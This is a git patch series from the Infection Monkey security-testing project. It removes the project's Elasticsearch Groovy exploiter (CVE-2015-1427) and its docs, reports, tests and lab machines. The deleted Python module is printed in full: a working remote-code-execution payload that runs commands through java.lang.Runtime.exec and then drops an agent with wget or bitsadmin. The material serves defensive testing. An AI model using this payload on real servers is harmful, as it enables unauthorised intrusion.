From 31e6c09673c72a47338b094df00a3269b5b46953 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 14:42:36 +0530 Subject: [PATCH 1/9] Project: Replace ElasticSearch with Zerologon in README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 7342c49a7..6b427e036 100644 --- a/README.md +++ b/README.md @@ -47,7 +47,7 @@ The Infection Monkey uses the following techniques and exploits to propagate to * SMB * WMI * Log4Shell - * Elastic Search (CVE-2015-1427) + * Zerologon * Weblogic server * and more, see our [Documentation hub](https://www.guardicore.com/infectionmonkey/docs/reference/exploiters/) for more information about our RCE exploiters. From b1fbf64730ddc60c7c6edd34064eb5ff27df3fbb Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 14:43:59 +0530 Subject: [PATCH 2/9] Docs: Remove ElasticSearch exploiter documentation --- docs/content/reference/exploiters/ElasticGroovy.md | 13 ------------- 1 file changed, 13 deletions(-) delete mode 100644 docs/content/reference/exploiters/ElasticGroovy.md diff --git a/docs/content/reference/exploiters/ElasticGroovy.md b/docs/content/reference/exploiters/ElasticGroovy.md deleted file mode 100644 index 86ae4247c..000000000 --- a/docs/content/reference/exploiters/ElasticGroovy.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: "ElasticGroovy" -date: 2020-07-14T08:41:40+03:00 -draft: false -tags: ["exploit", "windows", "linux"] ---- -### Description - -CVE-2015-1427 - -> The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x (before 1.4.3) allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script. - -The logic is based on the [Metasploit module](https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66/modules/exploits/multi/elasticsearch/search_groovy_script.rb). From b6438edb82ddd6eb714a1f9714419097c6ff2c45 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 14:55:42 +0530 Subject: [PATCH 3/9] Agent: Remove ElasticGroovyExploiter --- monkey/infection_monkey/example.conf | 1 - .../infection_monkey/exploit/elasticgroovy.py | 114 ------------------ 2 files changed, 115 deletions(-) delete mode 100644 monkey/infection_monkey/exploit/elasticgroovy.py diff --git a/monkey/infection_monkey/example.conf b/monkey/infection_monkey/example.conf index efb9a4350..b1a25d51f 100644 --- a/monkey/infection_monkey/example.conf +++ b/monkey/infection_monkey/example.conf @@ -27,7 +27,6 @@ "SSHExploiter", "SmbExploiter", "WmiExploiter", - "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", diff --git a/monkey/infection_monkey/exploit/elasticgroovy.py b/monkey/infection_monkey/exploit/elasticgroovy.py deleted file mode 100644 index 6c2751418..000000000 --- a/monkey/infection_monkey/exploit/elasticgroovy.py +++ /dev/null @@ -1,114 +0,0 @@ -""" - Implementation is based on elastic search groovy exploit by metasploit - https://github.com/rapid7/metasploit-framework/blob/12198a088132f047e0a86724bc5ebba92a73ac66 - /modules/exploits/multi/elasticsearch/search_groovy_script.rb - Max vulnerable elasticsearch version is "1.4.2" -""" - -import json -import logging -import re - -import requests - -from common.common_consts.network_consts import ES_SERVICE -from common.utils.attack_utils import BITS_UPLOAD_STRING, ScanStatus -from infection_monkey.exploit.web_rce import WebRCE -from infection_monkey.model import ( - BITSADMIN_CMDLINE_HTTP, - CHECK_COMMAND, - CMD_PREFIX, - DOWNLOAD_TIMEOUT, - ID_STRING, - WGET_HTTP_UPLOAD, -) -from infection_monkey.network_scanning.elasticfinger import ES_PORT -from infection_monkey.telemetry.attack.t1197_telem import T1197Telem - -logger = logging.getLogger(__name__) - - -class ElasticGroovyExploiter(WebRCE): - # attack URLs - MONKEY_RESULT_FIELD = "monkey_result" - GENERIC_QUERY = ( - """{"size":1, "script_fields":{"%s": {"script": "%%s"}}}""" % MONKEY_RESULT_FIELD - ) - JAVA_CMD = GENERIC_QUERY % ( - """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(""" - """\\"%s\\").getText()""" - ) - - _TARGET_OS_TYPE = ["linux", "windows"] - _EXPLOITED_SERVICE = "Elastic search" - - def __init__(self, host): - super(ElasticGroovyExploiter, self).__init__(host) - - def get_exploit_config(self): - exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() - exploit_config["dropper"] = True - exploit_config["url_extensions"] = ["_search?pretty"] - exploit_config["upload_commands"] = { - "linux": WGET_HTTP_UPLOAD, - "windows": CMD_PREFIX + " " + BITSADMIN_CMDLINE_HTTP, - } - return exploit_config - - def get_open_service_ports(self, port_list, names): - # We must append elastic port we get from elastic fingerprint module because It's not - # marked as 'http' service - valid_ports = WebRCE.get_open_service_ports(self.host, port_list, names) - if ES_SERVICE in self.host.services: - valid_ports.append([ES_PORT, False]) - return valid_ports - - def exploit(self, url, command): - command = re.sub(r"\\", r"\\\\\\\\", command) - payload = self.JAVA_CMD % command - try: - response = requests.get(url, data=payload, timeout=DOWNLOAD_TIMEOUT) - except requests.ReadTimeout: - logger.error( - "Elastic couldn't upload monkey, because server didn't respond to upload " - "request." - ) - return False - result = self.get_results(response) - if not result: - return False - return result[0] - - def upload_monkey(self, url, commands=None): - result = super(ElasticGroovyExploiter, self).upload_monkey(url, commands) - if "windows" in self.host.os["type"] and result: - T1197Telem(ScanStatus.USED, self.host, BITS_UPLOAD_STRING).send() - return result - - def get_results(self, response): - """ - Extracts the result data from our attack - :return: List of data fields or None - """ - try: - json_resp = json.loads(response.text) - return json_resp["hits"]["hits"][0]["fields"][self.MONKEY_RESULT_FIELD] - except (KeyError, IndexError): - return None - - def check_if_exploitable(self, url): - # Overridden web_rce method that adds CMD prefix for windows command - try: - if "windows" in self.host.os["type"]: - resp = self.exploit(url, CMD_PREFIX + " " + CHECK_COMMAND) - else: - resp = self.exploit(url, CHECK_COMMAND) - if resp is True: - return True - elif resp is not False and ID_STRING in resp: - return True - else: - return False - except Exception as e: - logger.error("Host's exploitability check failed due to: %s" % e) - return False From 3ff7daa2d563053fbff9b51d90c7f2b21a72f86f Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 15:03:57 +0530 Subject: [PATCH 4/9] UI: Remove ElasticGroovyExploiter reporting --- .../cc/services/config_schema/basic.py | 1 - .../definitions/exploiter_classes.py | 9 -------- .../cc/services/reporting/aws_exporter.py | 16 ------------- .../exploiter_descriptor_enum.py | 3 --- .../report-components/SecurityReport.js | 6 ----- .../security/issues/ElasticIssue.js | 23 ------------------- 6 files changed, 58 deletions(-) delete mode 100644 monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ElasticIssue.js diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py index 0f841e968..a67205234 100644 --- a/monkey/monkey_island/cc/services/config_schema/basic.py +++ b/monkey/monkey_island/cc/services/config_schema/basic.py @@ -18,7 +18,6 @@ BASIC = { "WmiExploiter", "SSHExploiter", "Log4ShellExploiter", - "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py index e9a5ac5ea..a6e0fbd4d 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/exploiter_classes.py @@ -53,15 +53,6 @@ EXPLOITER_CLASSES = { "link": "https://www.guardicore.com/infectionmonkey/docs/reference" "/exploiters/sshexec/", }, - { - "type": "string", - "enum": ["ElasticGroovyExploiter"], - "title": "ElasticGroovy Exploiter", - "safe": True, - "info": "CVE-2015-1427. Logic is based on Metasploit module.", - "link": "https://www.guardicore.com/infectionmonkey/docs/reference/exploiters" - "/elasticgroovy/", - }, { "type": "string", "enum": ["Struts2Exploiter"], diff --git a/monkey/monkey_island/cc/services/reporting/aws_exporter.py b/monkey/monkey_island/cc/services/reporting/aws_exporter.py index 00d738b07..137b26224 100644 --- a/monkey/monkey_island/cc/services/reporting/aws_exporter.py +++ b/monkey/monkey_island/cc/services/reporting/aws_exporter.py @@ -69,7 +69,6 @@ class AWSExporter(Exporter): CredentialType.KEY.value: AWSExporter._handle_ssh_key_issue, }, "tunnel": AWSExporter._handle_tunnel_issue, - ExploiterDescriptorEnum.ELASTIC.value.class_name: AWSExporter._handle_elastic_issue, ExploiterDescriptorEnum.SMB.value.class_name: { CredentialType.PASSWORD.value: AWSExporter._handle_smb_password_issue, CredentialType.HASH.value: AWSExporter._handle_smb_pth_issue, @@ -245,21 +244,6 @@ class AWSExporter(Exporter): instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, ) - @staticmethod - def _handle_elastic_issue(issue, instance_arn): - - return AWSExporter._build_generic_finding( - severity=10, - title="Elastic Search servers are vulnerable to CVE-2015-1427", - description="Update your Elastic Search server to version 1.4.3 and up.", - recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. " - "The attack was made " - "possible because the Elastic Search server was not patched " - "against CVE-2015-1427.".format(issue["machine"], issue["ip_address"]), - instance_arn=instance_arn, - instance_id=issue["aws_instance_id"] if "aws_instance_id" in issue else None, - ) - @staticmethod def _handle_island_cross_segment_issue(issue, instance_arn): diff --git a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py index 91855329e..2425b6435 100644 --- a/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py +++ b/monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py @@ -28,9 +28,6 @@ class ExploiterDescriptorEnum(Enum): SMB = ExploiterDescriptor("SmbExploiter", "SMB Exploiter", CredExploitProcessor) WMI = ExploiterDescriptor("WmiExploiter", "WMI Exploiter", CredExploitProcessor) SSH = ExploiterDescriptor("SSHExploiter", "SSH Exploiter", CredExploitProcessor) - ELASTIC = ExploiterDescriptor( - "ElasticGroovyExploiter", "Elastic Groovy Exploiter", ExploitProcessor - ) STRUTS2 = ExploiterDescriptor("Struts2Exploiter", "Struts2 Exploiter", ExploitProcessor) WEBLOGIC = ExploiterDescriptor( "WebLogicExploiter", "Oracle WebLogic Exploiter", ExploitProcessor diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js index a923d01f2..932879fea 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/SecurityReport.js @@ -27,7 +27,6 @@ import {mssqlIssueOverview, mssqlIssueReport} from './security/issues/MssqlIssue import {drupalIssueOverview, drupalIssueReport} from './security/issues/DrupalIssue'; import {wmiPasswordIssueReport, wmiPthIssueReport} from './security/issues/WmiIssue'; import {sshKeysReport, shhIssueReport, sshIssueOverview} from './security/issues/SshIssue'; -import {elasticIssueOverview, elasticIssueReport} from './security/issues/ElasticIssue'; import {log4shellIssueOverview, log4shellIssueReport} from './security/issues/Log4ShellIssue'; import { crossSegmentIssueOverview, @@ -119,11 +118,6 @@ class ReportPageComponent extends AuthComponent { }, [this.issueContentTypes.TYPE]: this.issueTypes.DANGER }, - 'ElasticGroovyExploiter': { - [this.issueContentTypes.OVERVIEW]: elasticIssueOverview, - [this.issueContentTypes.REPORT]: elasticIssueReport, - [this.issueContentTypes.TYPE]: this.issueTypes.DANGER - }, 'PowerShellExploiter': { [this.issueContentTypes.OVERVIEW]: powershellIssueOverview, [this.issueContentTypes.REPORT]: powershellIssueReport, diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ElasticIssue.js b/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ElasticIssue.js deleted file mode 100644 index 4d389bf2b..000000000 --- a/monkey/monkey_island/cc/ui/src/components/report-components/security/issues/ElasticIssue.js +++ /dev/null @@ -1,23 +0,0 @@ -import React from 'react'; -import CollapsibleWellComponent from '../CollapsibleWell'; - -export function elasticIssueOverview() { - return (
  • Elasticsearch servers are vulnerable to CVE-2015-1427. -
    • ) -} - -export function elasticIssueReport(issue) { - return ( - <> - Update your Elastic Search server to version 1.4.3 and up. - - The machine {issue.machine} ({issue.ip_address}) is vulnerable to an Elastic Groovy attack. -
    - The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427. -     - - ); -} From 35d39b46c7c48005db84cd3023f8d8ca0959520e Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 15:10:31 +0530 Subject: [PATCH 5/9] UT: Remove ElasticGroovyExploiter references --- .../monkey_configs/automated_master_config.json | 1 - monkey/tests/data_for_tests/monkey_configs/flat_config.json | 1 - .../data_for_tests/monkey_configs/monkey_config_standard.json | 1 - .../cc/services/edge/test_displayed_edge_service.py | 4 ++-- .../reporting/exploitations/test_monkey_exploitation.py | 2 +- .../monkey_island/cc/services/reporting/test_report.py | 4 ++-- .../tests/unit_tests/monkey_island/cc/services/test_config.py | 1 - 7 files changed, 5 insertions(+), 9 deletions(-) diff --git a/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json b/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json index aaed36c1c..c89ab6c04 100644 --- a/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json +++ b/monkey/tests/data_for_tests/monkey_configs/automated_master_config.json @@ -54,7 +54,6 @@ ], "vulnerability": [ {"name": "DrupalExploiter"}, - {"name": "ElasticGroovyExploiter"}, {"name": "HadoopExploiter"}, {"name": "ShellShockExploiter"}, {"name": "Struts2Exploiter"}, diff --git a/monkey/tests/data_for_tests/monkey_configs/flat_config.json b/monkey/tests/data_for_tests/monkey_configs/flat_config.json index b4ec2c46c..acce7f2ae 100644 --- a/monkey/tests/data_for_tests/monkey_configs/flat_config.json +++ b/monkey/tests/data_for_tests/monkey_configs/flat_config.json @@ -52,7 +52,6 @@ "SmbExploiter", "WmiExploiter", "SSHExploiter", - "ElasticGroovyExploiter", "Struts2Exploiter", "ZerologonExploiter", "WebLogicExploiter", diff --git a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json index 33944c305..658e4cc68 100644 --- a/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json +++ b/monkey/tests/data_for_tests/monkey_configs/monkey_config_standard.json @@ -5,7 +5,6 @@ "SmbExploiter", "WmiExploiter", "SSHExploiter", - "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/edge/test_displayed_edge_service.py b/monkey/tests/unit_tests/monkey_island/cc/services/edge/test_displayed_edge_service.py index 4c7ca36a7..aadd13f60 100644 --- a/monkey/tests/unit_tests/monkey_island/cc/services/edge/test_displayed_edge_service.py +++ b/monkey/tests/unit_tests/monkey_island/cc/services/edge/test_displayed_edge_service.py @@ -27,9 +27,9 @@ SCAN_DATA_MOCK = [ EXPLOIT_DATA_MOCK = [ { "result": True, - "exploiter": "ElasticGroovyExploiter", + "exploiter": "ZerologonExploiter", "info": { - "display_name": "Elastic search", + "display_name": "Zerologon", "started": "2020-05-11T08:59:38.105Z", "finished": "2020-05-11T08:59:38.106Z", "vulnerable_urls": [], diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/reporting/exploitations/test_monkey_exploitation.py b/monkey/tests/unit_tests/monkey_island/cc/services/reporting/exploitations/test_monkey_exploitation.py index f40e09c62..1c0377807 100644 --- a/monkey/tests/unit_tests/monkey_island/cc/services/reporting/exploitations/test_monkey_exploitation.py +++ b/monkey/tests/unit_tests/monkey_island/cc/services/reporting/exploitations/test_monkey_exploitation.py @@ -11,7 +11,7 @@ from monkey_island.cc.services.reporting.exploitations.monkey_exploitation impor def test_get_exploits_used_on_node__2_exploits(): exploits = get_exploits_used_on_node(NODE_DICT) - assert sorted(exploits) == sorted(["Elastic Groovy Exploiter", "Drupal Server Exploiter"]) + assert sorted(exploits) == sorted(["Zerologon Exploiter", "Drupal Server Exploiter"]) def test_get_exploits_used_on_node__duplicate_exploits(): diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/reporting/test_report.py b/monkey/tests/unit_tests/monkey_island/cc/services/reporting/test_report.py index efc59f5ae..c33f0087b 100644 --- a/monkey/tests/unit_tests/monkey_island/cc/services/reporting/test_report.py +++ b/monkey/tests/unit_tests/monkey_island/cc/services/reporting/test_report.py @@ -110,9 +110,9 @@ NODE_DICT = { }, { "exploitation_result": True, - "exploiter": "ElasticGroovyExploiter", + "exploiter": "ZerologonExploiter", "info": { - "display_name": "Elastic search", + "display_name": "Zerologon", "started": datetime.datetime(2021, 2, 19, 9, 0, 15, 16000), "finished": datetime.datetime(2021, 2, 19, 9, 0, 15, 17000), "vulnerable_urls": [], diff --git a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py index 58e762036..010e1ce34 100644 --- a/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py +++ b/monkey/tests/unit_tests/monkey_island/cc/services/test_config.py @@ -185,7 +185,6 @@ def test_format_config_for_agent__exploiters(flat_monkey_config): ], "vulnerability": [ {"name": "DrupalExploiter", "options": {}}, - {"name": "ElasticGroovyExploiter", "options": {}}, {"name": "HadoopExploiter", "options": {}}, {"name": "Struts2Exploiter", "options": {}}, {"name": "WebLogicExploiter", "options": {}}, From a599edec15b4e16d2218bf84059b9a4bdfdf84f3 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 15:12:00 +0530 Subject: [PATCH 6/9] Project: Remove ELASTIC exploiter descriptor enum from Vulture's allowlist --- vulture_allowlist.py | 1 - 1 file changed, 1 deletion(-) diff --git a/vulture_allowlist.py b/vulture_allowlist.py index 655590dcf..67399ff55 100644 --- a/vulture_allowlist.py +++ b/vulture_allowlist.py @@ -56,7 +56,6 @@ credential_type # unused variable (monkey/monkey_island/cc/services/reporting/i password_restored # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_report_info.py:23) SSH # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:30) SAMBACRY # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:31) -ELASTIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:32) STRUTS2 # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:39) WEBLOGIC # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:40) HADOOP # unused variable (monkey/monkey_island/cc/services/reporting/issue_processing/exploit_processing/exploiter_descriptor_enum.py:43) From 6c7e63046580b070e32f7bae2aee3d18a4044c66 Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 15:14:32 +0530 Subject: [PATCH 7/9] BB: Remove ElasticGroovyExploiter references --- .../blackbox/config_templates/elastic.py | 20 ------------------- .../blackbox/config_templates/performance.py | 1 - .../blackbox/gcp_test_machine_list.py | 2 -- envs/monkey_zoo/blackbox/test_blackbox.py | 6 +----- .../utils/config_generation_script.py | 2 -- 5 files changed, 1 insertion(+), 30 deletions(-) delete mode 100644 envs/monkey_zoo/blackbox/config_templates/elastic.py diff --git a/envs/monkey_zoo/blackbox/config_templates/elastic.py b/envs/monkey_zoo/blackbox/config_templates/elastic.py deleted file mode 100644 index 0a89b9cc3..000000000 --- a/envs/monkey_zoo/blackbox/config_templates/elastic.py +++ /dev/null @@ -1,20 +0,0 @@ -from copy import copy - -from envs.monkey_zoo.blackbox.config_templates.base_template import BaseTemplate -from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate - - -class Elastic(ConfigTemplate): - - config_values = copy(BaseTemplate.config_values) - - config_values.update( - { - "basic.exploiters.exploiter_classes": ["ElasticGroovyExploiter"], - "internal.classes.finger_classes": ["PingScanner", "HTTPFinger", "ElasticFinger"], - "basic_network.scope.subnet_scan_list": ["10.2.2.4", "10.2.2.5"], - "basic_network.scope.depth": 1, - "internal.network.tcp_scanner.HTTP_PORTS": [9200], - "internal.network.tcp_scanner.tcp_target_ports": [], - } - ) diff --git a/envs/monkey_zoo/blackbox/config_templates/performance.py b/envs/monkey_zoo/blackbox/config_templates/performance.py index 6108664a7..4eb8a3243 100644 --- a/envs/monkey_zoo/blackbox/config_templates/performance.py +++ b/envs/monkey_zoo/blackbox/config_templates/performance.py @@ -16,7 +16,6 @@ class Performance(ConfigTemplate): "SmbExploiter", "WmiExploiter", "SSHExploiter", - "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter", diff --git a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py index eadbd6213..1b5043e93 100644 --- a/envs/monkey_zoo/blackbox/gcp_test_machine_list.py +++ b/envs/monkey_zoo/blackbox/gcp_test_machine_list.py @@ -2,8 +2,6 @@ GCP_TEST_MACHINE_LIST = { "europe-west3-a": [ "sshkeys-11", "sshkeys-12", - "elastic-4", - "elastic-5", "hadoop-2", "hadoop-3", "mssql-16", diff --git a/envs/monkey_zoo/blackbox/test_blackbox.py b/envs/monkey_zoo/blackbox/test_blackbox.py index 2db234ed2..ff80451db 100644 --- a/envs/monkey_zoo/blackbox/test_blackbox.py +++ b/envs/monkey_zoo/blackbox/test_blackbox.py @@ -9,7 +9,6 @@ from envs.monkey_zoo.blackbox.analyzers.communication_analyzer import Communicat from envs.monkey_zoo.blackbox.analyzers.zerologon_analyzer import ZerologonAnalyzer from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal -from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr @@ -190,9 +189,6 @@ class TestMonkeyBlackbox: def test_drupal_exploiter(self, island_client): TestMonkeyBlackbox.run_exploitation_test(island_client, Drupal, "Drupal_exploiter") - def test_elastic_exploiter(self, island_client): - TestMonkeyBlackbox.run_exploitation_test(island_client, Elastic, "Elastic_exploiter") - def test_struts_exploiter(self, island_client): TestMonkeyBlackbox.run_exploitation_test(island_client, Struts2, "Struts2_exploiter") @@ -256,7 +252,7 @@ class TestMonkeyBlackbox: ) def test_report_generation_performance(self, island_client, quick_performance_tests): """ - This test includes the SSH + Elastic + Hadoop + MSSQL machines all in one test + This test includes the SSH + Hadoop + MSSQL machines all in one test for a total of 8 machines including the Monkey Island. Is has 2 analyzers - the regular one which checks all the Monkeys diff --git a/envs/monkey_zoo/blackbox/utils/config_generation_script.py b/envs/monkey_zoo/blackbox/utils/config_generation_script.py index 3f787870d..1bb66a080 100644 --- a/envs/monkey_zoo/blackbox/utils/config_generation_script.py +++ b/envs/monkey_zoo/blackbox/utils/config_generation_script.py @@ -4,7 +4,6 @@ from typing import Type from envs.monkey_zoo.blackbox.config_templates.config_template import ConfigTemplate from envs.monkey_zoo.blackbox.config_templates.drupal import Drupal -from envs.monkey_zoo.blackbox.config_templates.elastic import Elastic from envs.monkey_zoo.blackbox.config_templates.hadoop import Hadoop from envs.monkey_zoo.blackbox.config_templates.log4j_logstash import Log4jLogstash from envs.monkey_zoo.blackbox.config_templates.log4j_solr import Log4jSolr @@ -39,7 +38,6 @@ island_client = MonkeyIslandClient(args.island_ip) CONFIG_TEMPLATES = [ - Elastic, Hadoop, Mssql, Performance, From 7d76d949597690122aadb28fc899e43e35becb2e Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 15:16:06 +0530 Subject: [PATCH 8/9] Zoo: Remove Elastic machines from terraform scripts and docs --- envs/monkey_zoo/docs/fullDocs.md | 76 ------------------------- envs/monkey_zoo/terraform/images.tf | 8 --- envs/monkey_zoo/terraform/monkey_zoo.tf | 30 ---------- 3 files changed, 114 deletions(-) diff --git a/envs/monkey_zoo/docs/fullDocs.md b/envs/monkey_zoo/docs/fullDocs.md index 0381eae34..08ffb4e5e 100644 --- a/envs/monkey_zoo/docs/fullDocs.md +++ b/envs/monkey_zoo/docs/fullDocs.md @@ -9,8 +9,6 @@ This document describes Infection Monkey’s test network, how to deploy and use [Machines](#machines)
    [Nr. 2 Hadoop](#_Toc526517182)
    [Nr. 3 Hadoop](#_Toc526517183)
    -[Nr. 4 Elastic](#_Toc526517184)
    -[Nr. 5 Elastic](#_Toc526517185)
    [Nr. 9 Tunneling M1](#_Toc536021462)
    [Nr. 10 Tunneling M2](#_Toc536021463)
    [Nr. 11 SSH key steal](#_Toc526517190)
    @@ -251,80 +249,6 @@ Update all requirements using deployment script:
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    Nr. 4 Elastic

    -

    (10.2.2.4)

    		(Vulnerable)
    OS:Ubuntu 16.04.05 x64
    Software:

    JDK,

    -

    Elastic 1.4.2

    Default server’s port:9200
    Server’s config:Default
    Scan results:Machine exploited using Elastic exploiter
    Notes:Quick tutorial on how to add entries (was useful when setting up).
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

    Nr. 5 Elastic

    -

    (10.2.2.5)

    		(Vulnerable)
    OS:Windows 10 x64
    Software:

    JDK,

    -

    Elastic 1.4.2

    Default server’s port:9200
    Server’s config:Default
    Scan results:Machine exploited using Elastic exploiter
    Notes:Quick tutorial on how to add entries (was useful when setting up).
    - diff --git a/envs/monkey_zoo/terraform/images.tf b/envs/monkey_zoo/terraform/images.tf index 23632514a..3a197b720 100644 --- a/envs/monkey_zoo/terraform/images.tf +++ b/envs/monkey_zoo/terraform/images.tf @@ -7,14 +7,6 @@ data "google_compute_image" "hadoop-3" { name = "hadoop-3" project = local.monkeyzoo_project } -data "google_compute_image" "elastic-4" { - name = "elastic-4" - project = local.monkeyzoo_project -} -data "google_compute_image" "elastic-5" { - name = "elastic-5" - project = local.monkeyzoo_project -} data "google_compute_image" "tunneling-9" { name = "tunneling-9" project = local.monkeyzoo_project diff --git a/envs/monkey_zoo/terraform/monkey_zoo.tf b/envs/monkey_zoo/terraform/monkey_zoo.tf index eff0a44e5..0a32f2d05 100644 --- a/envs/monkey_zoo/terraform/monkey_zoo.tf +++ b/envs/monkey_zoo/terraform/monkey_zoo.tf @@ -76,36 +76,6 @@ resource "google_compute_instance_from_template" "hadoop-3" { } } -resource "google_compute_instance_from_template" "elastic-4" { - name = "${local.resource_prefix}elastic-4" - source_instance_template = local.default_ubuntu - boot_disk{ - initialize_params { - image = data.google_compute_image.elastic-4.self_link - } - auto_delete = true - } - network_interface { - subnetwork="${local.resource_prefix}monkeyzoo-main" - network_ip="10.2.2.4" - } -} - -resource "google_compute_instance_from_template" "elastic-5" { - name = "${local.resource_prefix}elastic-5" - source_instance_template = local.default_windows - boot_disk{ - initialize_params { - image = data.google_compute_image.elastic-5.self_link - } - auto_delete = true - } - network_interface { - subnetwork="${local.resource_prefix}monkeyzoo-main" - network_ip="10.2.2.5" - } -} - resource "google_compute_instance_from_template" "tunneling-9" { name = "${local.resource_prefix}tunneling-9" source_instance_template = local.default_ubuntu From 7e362283fa4b91430f9d93b6751b344af5edc50c Mon Sep 17 00:00:00 2001 From: Shreya Malviya Date: Thu, 24 Feb 2022 19:14:20 +0530 Subject: [PATCH 9/9] Changelog: Add entry for removing the Elastic Search exploiter --- CHANGELOG.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index 97017beb5..72eadb615 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -46,6 +46,7 @@ Changelog](https://keepachangelog.com/en/1.0.0/). - Agent bootloader. #1676 - Zero Trust integration with ScoutSuite. #1669 - ShellShock exploiter. #1733 +- ElasticGroovy exploiter. #1732 ### Fixed - A bug in network map page that caused delay of telemetry log loading. #1545